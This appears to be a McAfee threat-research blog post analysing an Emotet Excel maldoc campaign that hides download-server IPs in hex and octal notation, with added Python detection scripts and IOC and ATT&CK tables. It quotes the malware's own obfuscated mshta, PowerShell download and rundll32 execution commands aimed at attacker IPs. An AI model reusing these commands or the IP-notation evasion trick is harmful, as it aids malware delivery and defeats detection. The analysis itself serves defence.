Authored By: Kiran Raj
In a recent Emotet campaign, McAfee Researchers noticed a change in technique. The Emotet maldoc uses hexadecimal and octal notation to represent the IP address of its download server, where the usual dotted-decimal notation would be expected. Examples from the campaign are shown below (the hexadecimal and octal samples point at two different servers):
Hexadecimal format: 0xb907d607 (resolves to 185.7.214.7)
Octal format: 0056.0151.0121.0114 (resolves to 46.105.81.76)
Decimal format: 185.7.214.7
This change of notation may evade AV products that match on command-line parameters, because the dotted-decimal address never appears in the command line, but McAfee was still able to protect our customers. This blog explains the new technique.
Threat Summary
- The initial attack vector is a phishing email with a Microsoft Excel attachment.
- Upon opening the Excel document and enabling editing, Excel executes malicious JavaScript fetched from a remote server via mshta.exe.
- The malicious JavaScript then invokes PowerShell to download the Emotet payload.
- The downloaded Emotet payload is executed by rundll32.exe and establishes a connection to the adversaries' command-and-control server.
Maldoc Analysis
Below is the image (figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social-engineering message asking the user to enable content. By enabling content, the user allows the malicious code to run.
On analysing the Excel spreadsheet further, we can see several cell addresses added in the Name Manager window. The cells referenced by the Auto_Open name are executed automatically when the workbook opens, resulting in malicious code execution.

Below are the commands used in the hexadecimal and octal variants of the maldocs. The carets (^) are cmd.exe escape characters that are removed before the command runs, so they only break up the strings mshta and http:// for signature-based scanners.

| FORMAT | OBFUSCATED CMD | DEOBFUSCATED URL |
| --- | --- | --- |
| Hexadecimal | cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html | http://185[.]7[.]214[.]7/fer/fer.html |
| Octal | cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html | http://46[.]105[.]81[.]76/c.html |
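To match on the real destination rather than on whatever notation the attacker chose, a command-line based detection has to undo both layers shown above: the cmd.exe caret escaping and the numeric-address notation. The script below is an added example, not code from the original post or from McAfee; it implements the classic inet_aton() parsing rules (1 to 4 dot-separated parts, each hexadecimal with 0x, octal with a leading 0, or decimal, the last part filling the remaining bytes), which is why it also handles the single 32-bit "dword" and mixed-notation forms that the same rules accept, beyond the two variants in the table. The sample command lines are constructed to mirror the two maldoc variants (with the defanging brackets removed) and are not captured telemetry.

```python
"""Normalize hex/octal/dword IP notations hidden in cmd.exe command lines.

Added example (not code from the original post). The parser follows the
classic inet_aton() rules, so it recovers the dotted-decimal host from every
notation used in the campaign and from the single-number and mixed forms
those rules also accept.
"""
import re

# One address component: hex (0x..), octal (leading 0, digits 0-7) or decimal.
_PART = re.compile(r"^(?:0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")
# Host portion of an http(s) URL once the carets are gone.
_URL_HOST = re.compile(r"https?://([^/\s:?#]+)", re.IGNORECASE)


def inet_aton_to_dotted(host: str):
    """Return the dotted-decimal form of *host*, or None if *host* is not a
    valid inet_aton() numeric address (for example a normal domain name).

    Rules: 1-4 dot-separated parts; all but the last must fit in one byte;
    the last part fills the remaining low-order bytes, so "0xb907d607" and
    "3104298503" are each a whole 32-bit address.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = []
    for p in parts:
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p, 10))
    if any(v > 0xFF for v in values[:-1]):
        return None
    last_bytes = 5 - len(values)            # bytes covered by the final part
    if values[-1] >= 1 << (8 * last_bytes):
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_bytes)) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping ("m^sh^t^a" -> "mshta", "^^" -> "^").
    Simplification (assumption): carets inside double quotes are treated
    the same way, which cmd.exe does not do."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def normalize_cmdline(cmdline: str):
    """Return (deobfuscated command line, [(host as written, dotted IP or None), ...])."""
    plain = strip_carets(cmdline)
    hosts = [(h, inet_aton_to_dotted(h)) for h in _URL_HOST.findall(plain)]
    return plain, hosts


# Constructed sample command lines: the two maldoc variants from the post plus
# forms the same parsing rules also accept. None of these are captured telemetry.
SAMPLE_CMDLINES = [
    "cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html",
    "cmd /c m^sh^t^a h^tt^p^:/^/0056.0151.0121.0114/c.html",
    "cmd /c mshta http://3104298503/fer/fer.html",        # single 32-bit decimal
    "cmd /c mshta http://0xb9.7.0326.7/fer/fer.html",     # mixed hex/decimal/octal
    "cmd /c mshta http://example.com/index.html",         # ordinary hostname
]


def scan(cmdlines=SAMPLE_CMDLINES):
    """Map each command line to the dotted IPs its URLs really point at,
    which is what a command-line based detection should match on."""
    results = {}
    for c in cmdlines:
        _plain, hosts = normalize_cmdline(c)
        results[c] = [dotted for _, dotted in hosts if dotted]
    return results


if __name__ == "__main__":
    for raw, ips in scan().items():
        print(f"{raw}\n    -> {ips or 'no numeric host'}")
```

The practical point is that the hexadecimal and octal samples from the table both normalize to addresses that can be compared against the IOC list, while a hostname such as example.com is left alone; any detection keyed on the literal string 185.7.214.7 in a command line misses the hexadecimal variant entirely.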
Execution
On execution, the Excel spreadsheet invokes mshta to download and run the malicious JavaScript, which is embedded in an HTML file.

The downloaded file fer.html, containing the malicious JavaScript, is encoded with HTML Guardian to obfuscate the code.

The malicious JavaScript invokes PowerShell to download the Emotet payload from "hxxp://185[.]7[.]214[.]7/fer/fer.png" to the path "C:\Users\Public\Documents\ssd.dll".
| cmd line | (New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png') |
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server.
| cmd line | cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString |
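The chain described in this section (Excel spawning cmd, which spawns mshta, which spawns PowerShell, which ends in rundll32 loading a DLL from C:\Users\Public) is easier to catch from process ancestry than from any one command line, because every step uses a signed Windows binary. The script below is an added example, not code from the original post or from McAfee: it walks parent links in process-creation telemetry and flags every signed-binary proxy (mshta, rundll32, PowerShell and similar) that descends from an Office application. The event records, their field names, the PIDs and the benign rundll32 entry are constructed to mirror the chain in the post and are not captured telemetry; the sets of Office applications and proxy binaries are assumptions a real deployment would tune.

```python
"""Flag the Excel -> cmd -> mshta -> powershell -> rundll32 chain from
process-creation telemetry.

Added example (not code from the original post). The event records, field
names and PIDs below are constructed to mirror the chain in the post.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumed lists; a real deployment would tune both.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
PROXY_BINARIES = {"mshta.exe", "rundll32.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name, lower-cased
    cmdline: str


# Constructed sample: the chain from the post plus one benign rundll32 launch
# by explorer.exe that must not be flagged.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "excel.exe", '"EXCEL.EXE" invoice.xls'),
    ProcEvent(300, 200, "cmd.exe", "cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html"),
    ProcEvent(400, 300, "mshta.exe", "mshta http://0xb907d607/fer/fer.html"),
    ProcEvent(500, 400, "powershell.exe",
              "powershell (New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fer.png')"),
    ProcEvent(600, 500, "cmd.exe",
              r"cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString"),
    ProcEvent(700, 600, "rundll32.exe",
              r"C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString"),
    ProcEvent(800, 100, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
]


def ancestry(events: List[ProcEvent], pid: int) -> List[ProcEvent]:
    """Walk parent links from *pid* upward; the process itself comes first,
    its oldest known ancestor last. Stops on unknown parents and on cycles."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    chain: List[ProcEvent] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def office_spawned_proxies(events: List[ProcEvent]) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, image, [images from the Office ancestor down to the process])
    for every proxy binary whose ancestry contains an Office application."""
    findings = []
    for e in events:
        if e.image not in PROXY_BINARIES:
            continue
        chain = ancestry(events, e.pid)
        for i, anc in enumerate(chain):
            if anc.image in OFFICE_APPS:
                path = [p.image for p in reversed(chain[: i + 1])]
                findings.append((e.pid, e.image, path))
                break
    return findings


def flagged_pids(events: List[ProcEvent] = SAMPLE_EVENTS) -> List[int]:
    """PIDs of the flagged processes, in event order."""
    return [pid for pid, _, _ in office_spawned_proxies(events)]


if __name__ == "__main__":
    for pid, image, path in office_spawned_proxies(SAMPLE_EVENTS):
        print(f"pid {pid} {image}: {' -> '.join(path)}")
```

On the constructed sample this flags mshta, PowerShell and the final rundll32 (PIDs 400, 500 and 700), each with its full path back to EXCEL.EXE, and leaves the explorer-launched rundll32 alone; the rule fires whatever IP notation or caret pattern the cmd line used, which is the property the IP-format change in this campaign is designed to defeat.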
IOC

| TYPE | VALUE | SCANNER | DETECTION NAME |
| --- | --- | --- | --- |
| XLS | 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c | McAfee LiveSafe and Total Protection | X97M/Downloader.nn |
| DLL | a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 | McAfee LiveSafe and Total Protection | Emotet-FSY |
| HTML URL | http://185[.]7[.]214[.]7/fer/fer.html, http://46[.]105[.]81[.]76/c.html | WebAdvisor | Blocked |
| DLL URL | http://185[.]7[.]214[.]7/fer/fer.png, http://46[.]105[.]81[.]76/cc.png | WebAdvisor | Blocked |
MITRE ATT&CK

| TECHNIQUE ID | TACTIC | TECHNIQUE DETAILS | DESCRIPTION |
| --- | --- | --- | --- |
| T1566 | Initial Access | Phishing: Spearphishing Attachment | The initial maldoc uses phishing text to convince users to open it |
| T1204 | Execution | User Execution | Manual execution by the user (enabling content) |
| T1071 | Command and Control | Application Layer Protocol | Attempts to connect to the C2 server over HTTP |
| T1059 | Execution | Command and Scripting Interpreter: starts CMD.EXE to execute commands | Excel uses cmd and PowerShell to execute commands |
| T1218 | Defense Evasion | Signed Binary Proxy Execution: uses RUNDLL32.EXE and MSHTA.EXE | rundll32 is used to run the downloaded payload; mshta is used to execute the malicious JavaScript |
Conclusion
Office documents have been used as an attack vector by many malware families in recent times. The threat actors behind these families keep changing their techniques in an attempt to evade detection. McAfee Researchers continuously monitor the threat landscape to identify these changes in technique, so that our customers stay protected and can go about their daily lives without having to worry about these threats.